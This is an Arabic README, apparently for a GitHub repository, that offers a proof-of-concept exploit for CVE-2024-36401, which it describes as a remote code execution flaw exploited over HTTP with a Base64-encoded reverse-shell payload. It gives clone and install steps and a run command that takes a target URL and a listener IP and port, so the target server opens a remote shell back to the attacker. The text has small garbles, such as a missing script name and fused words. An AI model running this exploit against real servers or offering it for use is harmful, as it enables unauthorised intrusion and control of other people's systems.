
إثبات مفهوم لاستغلال CVE-2024-36401 يتيح تنفيذ التعليمات البرمجية عن بُعد عبر طلبات HTTP مع توليد حمولة صدفة عكسية وترميز Base64.
يحتوي هذا المستودع على سكربت إثبات المفهوم (PoC) للثغرة الأمنية CVE-2024-36401، وهي ثغرة يمكن استغلالها لتحقيق تنفيذ التعليمات البرمجية عن بُعد على الخادم الهدف.
requestsاستنساخ هذا المستودع:
git clone https://github.com/yourusername/CVE-2024-36401-PoC.git
cd CVE-2024-36401-PoC
تثبيت مكتبة Python المطلوبة:
pip install requests
تأكد من أن type_names.txt موجود في نفس الدليل الذي يوجد فيه .
rev.pypython3 rev.py -u <target_url> -i <listener_ip> -p <listener_port>